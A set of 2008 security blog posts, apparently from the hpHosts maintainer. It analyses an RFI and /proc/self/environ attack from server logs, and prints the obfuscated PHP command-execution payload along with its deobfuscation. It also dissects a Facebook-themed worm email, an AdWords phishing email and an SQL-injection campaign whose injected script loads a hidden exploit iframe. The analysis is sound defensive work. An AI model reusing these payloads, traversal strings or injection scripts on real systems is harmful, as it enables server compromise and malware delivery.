2008-09-10 06:40:54 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0


The RFI (Remote File Inclusion), comes courtesy of;

http://bregler-gmbh.de/.sys/i???


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://bregler-gmbh.de/.sys/i???
Server IP: 212.227.240.102 [ regiocd.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 10 September 2008
Time: 08:49:35:49
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


Most likely a hacked server, but they've been notified.

The code that they've tried directly injecting is as follows;


<?
    $x0e="\145x\x65\x63";
    $x0f="\x66eo\146";
    $x10="\x66\x72ea\x64";
    $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";
    $x12="i\163\x5f\162\x65s\157ur\x63\x65";
    $x13="\152\157\x69\156";
    $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";
    $x15="ob\137\x65\156d\137\x63lea\156";
    $x16="\x6fb_st\x61\x72\164";
    $x17="\x70\141\163s\164\x68\162\165";
    $x18="\x70\143\154ose";
    $x19="p\157\160e\x6e";
    $x1a="\163h\145\154l\137\x65\170e\143";
    $x1b="\x73\x79s\x74e\x6d";
    function x0b($x0b){
        global$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;$x0c='';
        if(!empty($x0b)){if($x11('exec')){@$x0e($x0b,$x0c);$x0c=$x13("\n",$x0c);
    }
        elseif($x11('shell_exec')){$x0c=@$x1a($x0b);
    }
        elseif($x11('system')){@$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
    }
        elseif($x11('passthru')){@$x16();@$x17($x0b);$x0c=@$x14();@$x15();
    }
        elseif(@$x12($x0d=@$x19($x0b,"\x72"))){$x0c="";
            while(!@$x0f($x0d)){$x0c.=@$x10($x0d,1024);
    }
            @$x18($x0d);
    }
    }
            return$x0c;
    }
        echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");
?>


/edit

I sent this to the ladies and gents at the ISC (Internet Storm Center), and got a reply from Bojan Zdrnj (cheers Bojan :o));


Thanks for sending this. They basically obfuscate characters by using their hex or octal values. When you see numbers like this \111 it's their octal value and when you see numbers like \x1f it's the hex value.

You can clean this up by using perl easily. I just saved the original PHP (the one you sent) into sample.php and used the following line (two perl calls inside, this could be done in a single perl program as well):

$ perl -pe 's/\\(\d\d\d)/chr(oct($1))/ge' < sample.php | perl -pe 's/\\x(\d\d)/chr(hex($1))/ge'


Once you execute this you'll get readable code:

<?
    $x0e="exec";
    $x0f="feof";
    $x10="fread";
    $x11="function_exists";
    $x12="is_resource";
    $x13="join";
    $x14="ob_get_contents";
    $x15="ob_end_clean";
    $x16="ob_start";
    $x17="passthru";
    $x18="pclose";
    $x19="popen";
    $x1a="shell_exec";
    $x1b="system";
    function x0b($x0b){
    global$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;$x0c='';
    if(!empty($x0b)){if($x11('exec')){@$x0e($x0b,$x0c);$x0c=$x13("\n",$x0c);
    }
        elseif($x11('shell_exec')){$x0c=@$x1a($x0b);
    }
        elseif($x11('system')){@$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
    }
    elseif($x11('passthru')){@$x16();@$x17($x0b);$x0c=@$x14();@$x15();
    }
        elseif(@$x12($x0d=@$x19($x0b,"r"))){$x0c="";
            while(!@$x0f($x0d)){$x0c.=@$x10($x0d,1024);
    }
            @$x18($x0d);
    }
    }
            return$x0c;
    }
        echo x0b("echo cr4nk_rocks");
?>


This results in them trying to execute the command "echo cr4nk rocks" by using the PHP functions exec, shell_exec, system and passthru. At the end they probably check the result so if they get the string "cr4nk rocks" back, they know that the RFI attack worked.

Cheers,

Bojan
ISC Handler
Posted by MysteryFCM at 01:59
1 comments

Tuesday, 9 September 2008

An old friend added you as a friend on facebook

I received this one a few minutes ago, and am not normally excited at receiving "added you as a friend" stuff (I receive a ton of it from various social network sites, such as those I referenced previously), but this one caught my attention due to it's size - 290K, rather large for the e-mails I tend to receive.

Anywho, I decided to check it out, low and behold (you know whats coming), we gots ourselves both a worm and a little psychology going on "they'll think they gots friends and install our worm LOLZ!" - alas nope, I'm not that gullible.

The e-mail reads:


Facebook is a social utility that connects you with the people around you.

Facebook notifier

One of your old classmates added you as a friend on Facebook. We need to confirm that you know her in order for you to be friends on Facebook.

To see her picture please check your attachment.

Thanks,
The Facebook Team
Facebook © 2008


The attachment, picture.zip, contains (surprise surprise) a lovely little executable (picture.exe), and whilst my AV detected it as a worm (Worm/Agent.FT), I decided to upload it to VT anyway;

http://www.virustotal.com/analisis/792924e8c83e3f1230a0f8b44a11cddf

30/36 is unusually great - normally detection this high takes several weeks, not a couple days (it was apparently uploaded by someone else a couple days prior to my receiving it).

The entire e-mail + headers is as follows;


Exported by: Outlook Export v0.1.2

From: confirm-r16xa@facebookmail.com
E-mail:confirm-r16xa@facebookmail.com [ 204.15.20.125 - mx01.facebookmail.com ]
Date: 10/09/2008 09:15:07
Subject: An old friend added you as a friend on facebook
**************************************************************************
Links
**************************************************************************

Link: hxxp://www.facebook.com/
Domain: www.facebook.com
IP: 69.63.178.16 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://www.facebook.com/reset.php
Domain: www.facebook.com
IP: 69.63.178.16 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://static.ak.fbcdn.net/images/welcome/welcome_3.gif
Domain: static.ak.fbcdn.net
IP: 62.41.85.97 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<http://www.facebook.com/>
Email: Password:Remember me
Forgot Password? <http://www.facebook.com/reset.php>
<http://static.ak.fbcdn.net/images/welcome/welcome_3.gif>
Facebook is a social utility that connects you with the people around you.

Facebook notifier




One of your old classmates added you as a friend on Facebook. We need to confirm that you know her in order for you to be friends on Facebook.

To see her picture please check your attachment.


Thanks,

The Facebook Team

Facebook © 2008


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2><<A HREF="http://www.facebook.com/">http://www.facebook.com/</A>><BR>
Email: Password:Remember me<BR>
Forgot Password? <<A HREF="http://www.facebook.com/reset.php">http://www.facebook.com/reset.php</A>><BR>
 <<A HREF="http://static.ak.fbcdn.net/images/welcome/welcome_3.gif">http://static.ak.fbcdn.net/images/welcome/welcome_3.gif</A>><BR>
Facebook is a social utility that connects you with the people around you.<BR>
<BR>
Facebook notifier<BR>
<BR>
<BR>
<BR>
<BR>
One of your old classmates added you as a friend on Facebook. We need to confirm that you know her in order for you to be friends on Facebook.<BR>
<BR>
To see her picture please check your attachment.<BR>
<BR>
<BR>
Thanks,<BR>
<BR>
The Facebook Team<BR>
<BR>
Facebook © 2008<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <confirm-r16xa@facebookmail.com>
Delivered-To: services@[RMV]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-123.livemail.co.uk (Postfix) with SMTP id 0B8545DE8AE
for <services@[RMV]>; Wed, 10 Sep 2008 09:18:41 +0100 (BST)
Received: from facebookmail.com (mail.squires.co.za [196.37.170.133])
by smtp-in-123.livemail.co.uk (Postfix) with ESMTP id D206F5DE96E
for <services@[RMV]>; Wed, 10 Sep 2008 09:17:13 +0100 (BST)
From: confirm-r16xa@facebookmail.com
To: services@[RMV]
Subject: An old friend added you as a friend on facebook
Date: Wed, 10 Sep 2008 10:15:07 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_BC1902DD.257BF8A1"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080910081713.D206F5DE96E@smtp-in-123.livemail.co.uk>
X-Original-To: services@[RMV]


Needless to say, if you receive this - delete it!
Posted by MysteryFCM at 23:16
0 comments

hpHOSTS - UPDATED September 10th, 2008

hpHOSTS - UPDATED September 10th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of 53,747 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 10/09/2008 06:19

  2. Last Verified: 10/09/2008 05:30

Download hpHosts now!
http://hosts-file.net/?s=Download
Posted by MysteryFCM at 20:56
0 comments

The good guys are the bad guys? err ..... huh?

7Search.com just gave me a laugh with their article on how to remove the "bad" hosts file as they put it - you know the one, it's the same hosts file offered from myself, SpyBot Search & Destroy, and of course, MVPS.

How to delete the "bad" HOSTS file created by SpyBot, MVPS.org, hpHosts, etc.
http://faq.7search.com/index.php?action=artikel&cat=11&id=276&artlang=en

Why is this so funny? Well actually it's both funny and confusing. Confusing because 7Search also own the very very well known 7FaSSt and BrowserAccelerator (Ref: http://hosts-file.net/?s=browseraccelerator.com). This has long been known as spyware, and indeed, is still hosted on an IP thats filled with other malicious domains.

7Search recently also sued McAfee about their classing 7Search as malware. Why only McAfee? Who knows - their demanding McAfee remove any reference to their peddling malware was a nice touch though (what is it with these people wanting to remove references to nasty stuff they did? irrespective of how old, the user has a right to know).

7Search however, also own 7searcher.com, internetsupervision.com, validatedsites.com, validatedsite.com and trustgauge.com. These sites claim to provide you with information on how "trustworthy" a site is. Coming from a malware distributor, I just had to take a look. Under "Validation Process", they claim;
&When you register with ValidatedSite we immediately go to work validating your business and your website.

The address posted by the site is a genuine postal address where certified mail was sent, received and returned by the site owners.

The personal phone numbers of a website's owners and managers have been called to confirm ownership of a website.

Additional information this organization provides can be made available by clicking on the ValidatedSiteT seal.

Verification that the privacy policy of the site clearly states the safeguards and protection procedures in place for the e-mail addresses, credit card and personal information that visitors release.

The published phone numbers of the website have been called and verified as belonging to the web site.&

Great!, so err, how much does this "process" cost? Well apparently quite a bit;



Okay, for a laugh, lets see how much it would cost me for hpHosts shall we? - thats quite the price there. So what would my visitors see if they wanted to see how trustworthy I was, using their service? see for yourself - not very convincing, unless you want to be convinced to install their spyware. The ads at the top btw, go through ia1.7search.com, nice scam they've got there - you pay them all that money and they still try and make more out of you!.

They also allow you to "preview" what you'd apparently see about a site, when using their toolbar. The results are even more hillarious than before;



So what does it say about VitalSecurity then? A site I most definately DO trust. Not alot apparently, PG's "trust" rating is only 2 (prolly because he's not paid them to say otherwise). Infact, it seems every damn site I trust, has an extremely "low" trust rating.

So should you trust BrowserAccelerator, ValidatedSite, InternetSupervision, TrustGuage, 7Search - whatever they want to call themselves? Personally, I'm going for a resounding NO!. But I'm silly like that, I don't trust anyone that offers malware. I'll let you make your own mind up.

References

http://certifiedbug.com/blog/2008/08/30/7search-files-complaint-over-siteadvisors-spyware-tag/

http://www.theregister.co.uk/2008/08/28/7search_sues_mcafee/

http://www.emsisoft.com/en/malware/?Adware.ToolBar.7Search.a
Posted by MysteryFCM at 19:41
1 comments

Monday, 8 September 2008

New vURL Online updates

I've made a few more modifications to vURL Online. The main updates include the options to allow both spoofing the referer, and spoofing the country of origin.

The main reason for the latter is due to alot of malicious websites, redirecting you based on Geo-tracking (essentially, the country you are from). By selecting a different server, you can change where you appear to come from. Thus far I've only got 2 UK servers, and thanks to Tom (TeMerc Internet Countermeasures), a US server.

If you'd like to setup a mirror for me on a server in a different country (I could do with as many different countries as possible), please feel free to use the following PHP script I've written (the URL and referer parameters are required, so if you create your own, please allow for those), then send me the URL to where you've got the script (and of course, let me know which country it is in).


<?php
        $str =$_SERVER['QUERY_STRING'];
        parse_str(urldecode($str),$getVarArray);
        // URL to get
        $urlStr = $getVarArray['url'];
        $urlStr = htmlspecialchars($urlStr, ENT_QUOTES);
        // Referer URL to use
        $refStr = $getVarArray['ref'];
        $refStr = htmlspecialchars($refStr, ENT_QUOTES);
        // User agent to pass
        $uaStr = $_SERVER['HTTP_USER_AGENT'];
        
        // Get the contents
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $urlStr);
        curl_setopt($curl, CURLOPT_VERBOSE, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_REFERER, $refURL);
        curl_setopt($curl, CURLOPT_USERAGENT, $uaStr);
        $return = curl_exec($curl);
        curl_close($curl);
        print $return;
?>


Visit vURL Online at: vurl.mysteryfcm.co.uk

Announcement:
http://forum.hosts-file.net/viewtopic.php?f=42&t=716
Posted by MysteryFCM at 15:20
0 comments

SQL Exploitified!

I've been seeing these for some time now (indeed, I've been seeing attempts at exploiting the hpHosts server since atleast May), and figured I'd collate a list of those known to have been around, both old and new.

See the following for the results of those that were live/dead as of a few mins ago (note that there's been thousands of these domains since the attacks against everyone began, the list doesn't include them all as not all of them have been documented (or if they were, I couldn't locate them));

http://hosts-file.net/misc/SQL_Injection_Attacks.html

Some of the domains were found courtesy of the fantastic list at;

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

I had planned to do a write-up on how the exploit was attempted, but Michael (Bloombit) has done a much more detailed job than I had planned, so I'll leave that to him.

Connie also submitted one of these for inclusion in hpHosts toward the end of August, and further analysis saw the domain being led to, changing from time to time, before it finally pointed back to itself;

http://forum.hosts-file.net/viewtopic.php?p=4945#p4945

In all cases however, both old and new, the final result was the exploit attempting
to peddle the now well known rogue, AntivirusXP. See the following for an example;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.19ssl.net/script.js
Server IP: 84.157.239.55 [ p549DEF37.dip.t-dialin.net ]
        > 12.202.254.90 [ 12-202-254-90.client.mchsi.com ]
        > 76.104.72.250 [ c-76-104-72-250.hsd1.va.comcast.net ]
        > 24.1.175.116 [ c-24-1-175-116.hsd1.il.comcast.net ]
        > 200.165.57.31 [ Resolution failed ]
        > 75.49.217.223 [ adsl-75-49-217-223.dsl.emhril.sbcglobal.net ]
        > 121.170.44.90 [ Resolution failed ]
        > 87.116.180.136 [ cable-87-116-180-136.dynamic.sbb.rs ]
        > 69.37.33.66 [ JERRY_DESK ]
        > 71.193.25.70 [ c-71-193-25-70.hsd1.ca.comcast.net ]
        > 76.170.105.146 [ cpe-76-170-105-146.socal.res.rr.com ]
        > 70.218.74.127 [ 127.sub-70-218-74.myvzw.com ]
        > 68.80.34.22 [ c-68-80-34-22.hsd1.pa.comcast.net ]
        > 12.203.121.61 [ 12-203-121-61.client.mchsi.com ]
        > 79.179.170.191 [ bzq-79-179-170-191.red.bezeqint.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
Date: 08 September 2008
Time: 23:16:15:16
*****************************************************************
if(navigator.userAgent.indexOf('AntivirXP08')==-1){
document.write("<iframe src=http://aspx46.com/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>");
}


vURL Online:
http://vurl.mysteryfcm.co.uk/?url=http://www.19ssl.net/script.js&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on

... and not surprisingly, almost all of the newer one's I've spotted, have used fastflux. Oh and nope, the "NESCO Accounting and Finance" displayed on all of the resulting sites homepages, isn't real either ;o)
Posted by MysteryFCM at 14:45
0 comments

Sunday, 7 September 2008

OH NOES! My AdWords adverts aren't .... hang on a second!

It would seem, an account I never had, has adverts that I've never setup, not being ran. Oh dear, some silly scammer hasn't done their homework again (no surprise there then, these things aren't exactly targetted to specific people, they're just randomly spammed out).

The latest AdWords scam I've received is thus;


Exported by: Outlook Export v0.1.2


From: AdWords-NoReplay
E-mail:adwords-noreply@google.com [ 64.233.167.99 - py-in-f99.google.com ]
Date: 08/09/2008 09:51:36
Subject: Your ads are not running.
**************************************************************************
Links
**************************************************************************

Link: https://adwords.google.com/select/images/adwords_home/new_logogif
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: http://adwords.google.com/select
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: http://www.adwords.google.com.coisfon.cn/select/Login
        Domain: www.adwords.google.com.coisfon.cn
        IP: 87.69.85.21 [ Resolution failed ]
        hpHosts Status: Not Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false

Link: https://adwords.google.com/support/?hl=en_GB
        Domain: adwords.google.com
        IP: 64.233.183.112 [ Resolution failed ]
        hpHosts Status: Listed
        MDL Status: Not Listed
        PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<https://adwords.google.com/select/images/adwords_home/new_logogif>

Hello,

Our attempt to charge your credit card for your outstanding Google AdWords account balance was declined. Your account is still open. However, your ads have been suspended. Once we are able to charge your card and receive payment for your account
balance, we will re-activate your ads.

Please update your billing information, even if you plan to use the same credit card. This will trigger our billing system to try charging your card again. You do not need to contact us to reactivate your account.

To update your primary payment information, please follow these steps:

1. Log in to your account at http://adwords.google.com/select <http://www.adwords.google.com.coisfon.cn/select/Login> .
2. Enter your new or updated billing information.
6. Click 'Update' when you have finished.

In the future, you may wish to use a backup credit card in order to help ensure continuous delivery of your ads. You can add a backup credit card by visiting your Billing Preferences page or visit the AdWords Help Centre for more details:
https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB

Thank you for advertising with Google AdWords. We look forward to providing you with the most effective advertising available.

Sincerely,

The Google AdWords Team

---------------------------
This message was sent from a notification-only email address that does not accept incoming email. Please do not reply to this message. If you have any questions, please visit the Google AdWords Help Centre at https://adwords.google.com/support/?hl=en_GB to find answers to frequently asked questions and a 'contact us' link near the bottom of the page.
-----------------------------

**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2> <<A HREF="https://adwords.google.com/select/images/adwords_home/new_logogif">https://adwords.google.com/select/images/adwords_home/new_logogif</A>><BR>
<BR>
Hello,<BR>
<BR>
Our attempt to charge your credit card for your<BR>
outstanding Google AdWords account balance was declined.<BR>
Your account is still open. However, your ads have been suspended. Once<BR>
we are able to charge your card and receive payment for your account<BR>
balance, we will re-activate your ads.<BR>
<BR>
Please update your billing information, even if you plan to use the<BR>
same credit card. This will trigger our billing system to try charging<BR>
your card again. You do not need to contact us to reactivate your<BR>
account.<BR>
<BR>
To update your primary payment information, please follow these steps:<BR>
<BR>
1. Log in to your account at <A HREF="http://adwords.google.com/select">http://adwords.google.com/select</A> <<A HREF="http://www.adwords.google.com.coisfon.cn/select/Login">http://www.adwords.google.com.coisfon.cn/select/Login</A>> .<BR>
2. Enter your new or updated billing information.<BR>
6. Click 'Update' when you have finished.<BR>
<BR>
In the future, you may wish to use a backup credit card in order to<BR>
help ensure continuous delivery of your ads. You can add a backup<BR>
credit card by visiting your Billing Preferences page or visit the<BR>
AdWords Help Centre for more details:<BR>
<A HREF="https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB">https://adwords.google.com/support/bin/answer.py?answer=28857&hl=en_GB</A><BR>
<BR>
<BR>
<BR>
Thank you for advertising with Google AdWords. We look forward to<BR>
providing you with the most effective advertising available.<BR>
<BR>
Sincerely,<BR>
<BR>
The Google AdWords Team<BR>
<BR>
---------------------------<BR>
This message was sent from a notification-only email address that does<BR>
not accept incoming email. Please do not reply to this message. If you<BR>
have any questions, please visit the Google AdWords Help Centre at<BR>
<A HREF="https://adwords.google.com/support/?hl=en_GB">https://adwords.google.com/support/?hl=en_GB</A> to find answers to<BR>
frequently asked questions and a 'contact us' link near the bottom of<BR>
the page.<BR>
-----------------------------<BR>
<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <fleshpots@yahoo.com>
Delivered-To: services@[REMOVED]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
        by smtp-in-125.livemail.co.uk (Postfix) with SMTP id BE78B534184
        for <services@[REMOVED]>; Mon, 8 Sep 2008 09:51:18 +0100 (BST)
Received: from smtp-in-115.livemail.co.uk (smtp-in-115.livemail.co.uk [213.171.216.115])
        by smtp-in-125.livemail.co.uk (Postfix) with ESMTP id AB5F453418A
        for <ceo@[REMOVED]>; Mon, 8 Sep 2008 09:51:18 +0100 (BST)
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
        by smtp-in-115.livemail.co.uk (Postfix) with SMTP id 9109D327452
        for <abuse@[REMOVED]>; Mon, 8 Sep 2008 09:51:18 +0100 (BST)
Received: from [75.91.2.27] (h27.2.91.75.dynamic.ip.windstream.net [75.91.2.27])
        by smtp-in-115.livemail.co.uk (Postfix) with ESMTP id 55EB2327452
        for <abuse@[REMOVED]>; Mon, 8 Sep 2008 09:51:17 +0100 (BST)
Received: from [75.91.2.27] by f.mx.mail.yahoo.com; Mon, 8 Sep 2008 03:51:36 -0500
To: <abuse@[REMOVED]>
Subject: Your ads are not running.
Date: Mon, 8 Sep 2008 03:51:36 -0500
Message-ID: <01c91166$30cf5400$1b025b4b@fleshpots>
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0CCC_01C91166.30CF5400"
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AcgJyLD6O6KP8W7HVNC719G7XNH9M4==
Content-Language: us
From: "AdWords-NoReplay" <adwords-noreply@google.com>
X-Original-To: abuse@[REMOVED]


Also not surprising is that the scammy site itself (www.adwords.google.com.coisfon.cn) is running on a fastflux;




Ref:
http://hosts-file.net/?s=www.adwords.google.com.coisfon.cn

So what does the phishing page itself look like?



vURL Online results for this site:
http://vurl.mysteryfcm.co.uk/?url=http://www.adwords.google.com.coisfon.cn/select/Login/&selUAStr=1&cbxLinks=on&cbxSource=on&cbxBlacklist=on
Posted by MysteryFCM at 16:24
1 comments

vURL Online updated .... again

I've just done another quick update to vURL Online .... this time, I've added options to enable/disable;

1. Parsing links
2. Displaying source code
3. Checking blacklists

Still to come is an option to select the country that vURL should identify itself as coming from. This option is to be provided to allow for bypassing those malicious servers that use Geo-tracking to determine whether or not to serve exploit-X, exploit-Y or some-other-random-content.

I'm currently looking for non-UK servers to host the proxy script required for this. If you'd like to host a copy of the script, please do let me know. All the script has to do is;

1. Accept URL and User agent params using GET (NOT POST!!) request
2. Return site content

Nothing more complex than that.

Announcement, Support & Feedback:
http://forum.hosts-file.net/viewtopic.php?f=42&t=711

Visit vURL Online:
http://vurl.mysteryfcm.co.uk
Posted by MysteryFCM at 16:17
0 comments

Thursday, 4 September 2008

sURL Service bug fixes

I came across a couple bugs that have now been fixed;

1. Title is not always extracted
2. hpHosts status shown as listed when sURL target does not contain http:// *

